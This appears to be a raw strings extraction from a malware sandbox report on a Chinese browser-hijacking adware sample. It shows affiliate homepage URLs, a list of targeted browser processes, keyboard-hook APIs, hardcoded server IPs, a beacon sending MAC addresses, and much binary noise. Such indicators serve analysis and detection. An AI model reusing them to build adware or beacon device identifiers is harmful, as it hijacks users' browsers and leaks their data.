VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\dnsset
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\ZWebNds
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\stans
doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
levram.dll;$585A4114,$844FF124;$5848ECB9,$843D7CB8;$583C013B,$897F3672;$583553A9,$8989C64F;$00000000,$313E0221;$582435BA,$8417E647;$57FB091F,$8A9C56E2;$57EB753C,$83DDE427;$57CE2D72,$8A7954CB;$57E1041F,$83D44996;$57D278E8,$83AF7D19;$57CBD35C,$83A8239C;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
snqu_proxy_X64.pdb;BACK.pdb;
MainProX.exe*5C9389C539DDEAFFA58BF110B8ED8F03
wxpro.dll
Busiwork.dll
swaddresbar.dll
loguser.dll
WxVSafe.dll
lolhelper.dll
wxcore.dll
rmserver.exe
exploren.exe
services.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
svchost.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
conhost.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
Firefox.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
Chrom.exe
csrss.exe
baidubrowser.exe
2345Explorer.exe
liebao.exe
Maxthon.exe
TheWorld.exe
TaoBrowser.exe
7chrome.exe
FastIE.exe
FHBrowser.exe
350chrome.exe
ttraveler.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHELL32.dll
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
cacls.exe
extrac32.exe
wiaacmgr.exe
net.exe
sfc.exe
sort.exe
taskkill.exe
timeout.exe
wininit.exe
xcopy.exe
netsh.exe
notepad.exe
regedit.exe
reg.exe
rundll32.exe
cmd.exe
{C6CBEC98-70B9-4991-8CE5-5D846D28740C}
{60853F8B-2218-49CF-A58D-2561B9550406}
VVV.so.com
.dll, RunIt
C:\Windows\sysnative\Drivers\
%s [%8X][%d]
dllhost.exe
*.dll
684EF56E-2FAE-4ed2-BF46-F0440C5BE24F
%WinDir%\sysnative\
PubwinClient.exe
360Chrome\Chrome\
AppData\Local\360Chrome\Chrome\User Data\Default\Extensions\bkbmhmmokoibilcnakamkokmkbpnimoh
pWin7Server.exe
JXClint.exe
yebarclient.exe
TMyIdTCPServerEventCall$
TMyIdUDPServerEventCallU
NTDLL.DLL
$%X,$%X; $%X,$%X; %d KB
.hao123.com
VVV.baidu.com/
hXXp://
$%X,$%X; $%X,$%X;
123.sogou.com
123abc.dll
lass.exe
fash.exe
txupd.exe
PPAP.EXE
TENCENTDL.EXE
TMyCheckOpenUrl
TDRIVER_UrlWatchList
VVV.2345.com
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
rwyNCMc.exe
play.bat
hXXps://123.sogou.com/?71156-5497
hXXp://VVV.ip.cn/
b~~z0%%cz$ndyorc~$ieg%
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
KERNEL32.DLL
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
SetRegKey Error:
*.lnk
*.url
%d.%d.%d.%d
hinthk.dll
http:
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
;:9876543210/.-, *)('&%$#"!
.MU{0Z
.afK\
\@%CV
{PIkt%F
%D`o:
;RC.qXIlY
.Kq!]d
(.gw3
r.zhNyR8
.IcEA-
 1.Ez
c.BXMH
4T.Lp
.OGT#lf
).fZ.
%.Fdwz*
÷EA
5>.pnZm
H%dT8o
}n:%DI
i\.owG
Sj.Hug@
MsGN 
b<.sEg
T.QOo
ASC-0}X
E6(.Uj
D<.NB
T.kyXM
4.ck<
CMdsE
.Om,=
1%u3D
j.gmE,
.itF@
U0%xWI
=j{.so_
?456789:;<=
!"#$%&'()* ,-./0123
1iu2.iu
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegSetKeySecurity
RegNotifyChangeKeyValue
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
GetProcessHandleCount
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
MyHTTPSProxyRF
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(/*) ,*/.)*72-9
;<\22,-!(6'
No help keyword specified.
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Instruction TLB, 4Kb pages, 4-way set associative, 32 entries
Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.
*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

SearchProtocolHost.exe_992:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
Phx%s
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3104:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

b38a20ed8a675be0d249881f09a0b7a.exe_3404_rwx_02C59000_00003000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
version.dll
gdi32.dll
ole32.dll
comctl32.dll
shell32.dll
ShellExecuteA
wininet.dll
FindNextUrlCacheEntryA
URLMON.DLL
UrlMkGetSessionOption
wsock32.dll
ntdll.dll
psapi.dll
Rpcrt4.dll
OLEACC.DLL

b38a20ed8a675be0d249881f09a0b7a.exe_3404_rwx_6C281000_00118000:

diu2.iu
F%D,3
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
?*lchrome.exe
360se.exe
360chrome.exe
SogouExplorer.exe
f1browser.exe
liebao.exe
baidubrowser.exe
baidurender.exe
iexplore.exe
maxthon.exe
firefox.exe
qqchrometab.exe
QQBrowser.exe
hao123browser.exe
hao123Juzi.exe
2345chrome.exe
2345Explorer.exe
UCBrowser.exe
TheWorld.exe
Google Chrome
Chrome
Firefox
2345chrome
WinInet.dll
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
ntdll.dll
\StringFileInfo\xx\FileDescription
stage=%d&status=%d
stage=%d&status=0&p1=%s
kernel32.dll
-f0--%d--
-f1--%d--
-ijok--%d--
-f2--%d--
Write err=%d, FuncAddr=x
rpcrt4.dll
NtCreatePort
NtReplyWaitReceivePortEx
---f-adv-x---
--Reg Count Num=%d
--Reg Disp hret=x-
--Reg Web hret=x-
---f-ij2-x---
file/zconfig.txt
xxx.baidustatie.com
w.c-cnzz.com/cfjs/5636.js
services.exe
X-X-X-X-X-X
r.php?n=
cid=%s&bmac=%s&mac=%s&%s
182.140.144.166
456789:;<=
!"#$%&'(
F:\Source\webstream\condition_js_multi2\Release\MediaInfo.pdb
MediaInfo.dll
zcÁ
.text
`.rdata
@.data
.reloc
MSVCRT.dll
WaitNamedPipeA
KERNEL32.dll
WS2_32.dll
PSAPI.DLL
iphlpapi.dll
Update.dll
61.172.241.228
GET /jsadv/data.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: 61.172.241.228
_acmdln
USER32.dll
ADVAPI32.dll
SHELL32.dll
!!""##$$%%&&''(())**  ,,--..//0123456789:;<=>?
R%F#Z;
)8.ic
.kCii
SO*%F,
.VwIC
.BVA?
AdjustTokenPrivileges faild,error code is %d
LookupPrivilegeValue faild,error code is %d
%c%c%c%c%c%c.exe
\\.\Pipe\adXXXXXX
.pdata
@.rsrc
@.reloc
IEJS.dll
EnumChildWindows
EnumWindows
OLEAUT32.dll
GetCPInfo
GetProcessHeap
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
.rsrc
<.tS<>
111111111111
11111111
1111111111
chrome.exe
%d_byte ptr
0xX
 0xX
-0xX
[0xI64X] ANOMALY: REX prefix before legacy prefix 0xX
[0xI64X] ANOMALY: Duplicate prefix 0xX
[0xI64X] ERROR: Reached maximum prefix count %d
[0xI64X] ANOMALY: Reached maximum prefix count %d
[0xI64X] ERROR: Invalid opcode 0xX
[0xI64X] ERROR: Invalid two byte opcode 0xX 0xX
[0xI64X] ERROR: Opcode 0xX 0xX ("%s") illegal in 64-bit mode
[0xI64X] ERROR: Opcode 0xX 0xX ("%s") illegal with 16-bit operand size
[0xI64X] ERROR: Illegal SSE instruction opcode 0xX 0xX   prefix 0xX
[0xI64X] ERROR: Illegal SSE instruction opcode 0xX 0xX   prefix 0xX   extension %d
[0xI64X] ERROR: Invalid group opcode 0xX 0xX extension 0xX
[0xI64X] ERROR: Opcode 0xX ("%s") illegal in 64-bit mode
[0xI64X] ERROR: Opcode 0xX ("%s") illegal with 16-bit operand size
[0xI64X] ERROR: Invalid group opcode 0xX extension 0xX
[0xI64X] ERROR: Illegal opcode 0xX 0xX   modrm 0xX
[0xI64X] ERROR: Invalid FPU opcode 0xX   modrm extension 0xX (index 0xX)
[0xI64X] ANOMALY: operand size prefix used with 3DNOW instruction
[0xI64X] ERROR: Illegal opcode 0xX 0xX   suffix 0xX
[0xI64X] ERROR: Instruction "%s" (opcode 0xX) can't be used in 16-bit X86
[0xI64X] ERROR: Instruction "%s" (opcode 0xX) can only be used in X86-64
[0xI64X] ANOMALY: operand size prefix used with FPU/MMX/SSEx
[0xI64X] ANOMALY: use of operand size prefix meaningless when REX.w=1
[0xI64X] ANOMALY: use of REX.w is meaningless (default operand size is 64)
[0xI64X] ANOMALY: unexpected segment 0xX
[0xI64X] ERROR: Illegal use of lock prefix for instruction "%s"
[0xI64X] ERROR: maximum instruction length reached ("%s")
[0xI64X] ANOMALY: ENTER has invalid operand 2
[0xI64X] ANOMALY: ENTER has invalid operand 3
[0xI64X] ANOMALY: ret has invalid operand 1
[0xI64X] ANOMALY: retf has invalid operand 1
[0xI64X] ANOMALY: Instruction "%s" is modifying the stack
[0xI64X] ANOMALY: "%s" has invalid stack change 0xX
%s:[%s]
0xX=
]=0xX
[0xI64X] ANOMALY: Unexpected operand size prefix
%s 0xX:[
%s %s:[
[0xI64X] ERROR: mod != 3 for AMODE_PR ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_PR ("%s")
[0xI64X] ERROR: AMODE_PR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_VR ("%s")
[0xI64X] ERROR: AMODE_VR illegal in 16-bit mode ("%s")
[0xI64X] ERROR: invalid mmx register %d for AMODE_P ("%s")
[0xI64X] ERROR: AMODE_P illegal in 16-bit mode ("%s")
[0xI64X] ERROR: mod != 3 for AMODE_R ("%s")
seg_X
[0xI64X] ERROR: mod = 3 for AMODE_M ("%s")
[0xI64X] ERROR: mod = 3 for AMODE_E with OPTYPE_p ("%s")
xx
WebStreamInit called.
Version.dll
0000322b00002593EPg7C!HKKqKSBFeLwNNYeiin04gIEJPqHPhvJBrECakXUjXPe9gqbveSR171ZrVLlT1wmqFvSRmuwlfYjnxZfcycErLywq5Y2GYYcwULRgjuiRa5f5NTppF5EcPNA3kTf4n4MF;7UFPdM4foUApiDVXDrk:N8h7ehJj3jfawhD7wOuWd5W5ABB8jiqkaemi6YB4iSFsyDNUmGB5MzX2MqbWRbhyLfU:GeksTFduVLAkKJVYiJ6PxPi3amAxlCPytvP;cMZg9Bppj:UgmS28fecvyklcqHOBRuNxy;xYlrbLZIPOxhR7OJgFK57PT8Ci;6QQ5Yydas4;YU9ZcmNJMUvqRrhKkNBq3JodEVMXR4:;4a3UzIO:meZo:6TySCLPsKbx0wwQ;lIEIyfIVSJalJCASaijXN:yeYxxvyxD:XwCpaickzVNTA9S4tqha7y8J7G9m0qBTXg20nyVGZylpVHHc5zqW:92h8O5dhjZa3CmCrM0ThNgdIZdrfDv8Vm4IwTuZmL7liCmn;j1nOnPNJ92kcw;Mi6KgOX:DJXSZgeTS9kUWQNl7vAIeyaFVuhl;aM6AXamSxqSREY4QFvvC7RxxBQEay;mRf;AGCCKpHZvLsyuuB4gBTZpIfBNyBy;LRjRbJyrBMkym;bjDDyOwBh5OOcx7n88bCCRz0qiZOxvYm:qatO4mUTe6XbtjtMCgB5skuQQ3Z0NsrY5Y9YNwJ6I9BIRafnQHOi9ZxgjRIjqO9atHV2wpQVTKNdq8qWOcyLPIOQ;YpoEe2m1yR3bhac4mss2RaiNA4MZXFPllPRLs;dBTP94m74KGHdp8GDf3IZO58:Rk1v4IdQbHCvlyzk4FVuMJrWb4Xso7j7lclYiv7DPp8bc7X1:iXYeqSex6HROfsK3tinGNReY6M66KrQoNud6Gp60WFX30:zIvmef1kRupPsL8JU4ZFi6HiiN3rWAdcWee181t9AZN08:uDIlqvRdqTkX2oZAKcWEbY9;VAyLRanZmjIJwwpWGdTNVZS1;0EceU9rq1bmZRrWRSw2h;1cFTBZSkCPgLEuQEN6CvGnGA5BX6fyl7bzWWU6XPe9Cub8PoB7ziw:NHk6;tQwhC8tJYKC;6InbT4kalLweatWA4aOH3dPDUKAWaeUbMDMN12sQzzoCOuDDChtwAfidJ:xb6AZW:WEV0WewRW8:wBUro8WnlwKo4C8vmkRhwQHbhMCgXSxsJcmmLFDGM:prlQGRLF4;7Qx7MvJDHeDAEU;5DUT8:c5zDqPwuSNcrs9D7sp5Z:9QWmLBT3NLBhW1cwREddSiSZnuMaNpeMl9SDKnkNs8dHFN0IZUQPGBzBlDjG51Kx3JBuy;1yt9yuPXdAv;biGimvynYEGzASvEhhiYdxqtKgYZfYHMfgG;YRHdrlKGhYA9Ez9tw6GS84I4:7E7T84dDiWb7;zkN6rxkuach0fobEDm50FhLqZdg:Lutzof3Mh6;1nQVNc8ImPcYCqDZ57lQ6s8AOewf5VucbAq:Xa4NZpAolF4UCLyrIWc8ZoJHax1kxuSEbX1ZwmmBmWCh6GCE;nL73hLf1IyHRLIVLYPgsnhnKdsl6kUACVsbqag0f6OAmFDL3b9DNv4E:4HB5AkdGQs2g7iw1UoiW;BAadbZS4wJFFRb4btvEvuLD5qY;oc5ewUhLL8gZicve5CyDZdLb2dvQ2KWZf;4yWMu4ZQ3ovYgszB2iLc4PSBdgUwJds51GNlXPswgThKjYNdtgxGrw9GkMdBmS0DebAmy55AcBYQuT:qI16gVpUos56chovhjICog8;:gtjpHrahc2ErxSiyYwgrFtHXVwxYX9Vh7m297q47WwlH;pCi:tfyCbPw4OsV7wHaq2tDEKyRuMPOlPwLaUO9zLEfNlaR;m;g42U57VsACODd;tMpXPUuWEEdnq8FrXD8TQehuNUHTaHgPB3B391nFZWc42aIwQ3po6q4SslxwuPhVSv24veBpWK2pUXtKURSUPDTrrCeFAm;WPN5nIgwZ7oHHWh;eTlT:KJn8yIl:Jqzzx5bq;My0oU4oV1eFkNxkShXRaLtbPcYtj7:YaAqPeQ9PR3KOXjeZQ3IjjEPGEuBQXUE4BDdxDxI:a7:zz:OvVxQbrD5LjNXvMz4fFVq8iHYmiTdZ6VKE3BG0ONbJRzm7PYOgtKFrELXv75zl7VH:Cc85;F6FxjZ5trxyzys8QwDzwrRkTGkiqpWR8ileMkTALla6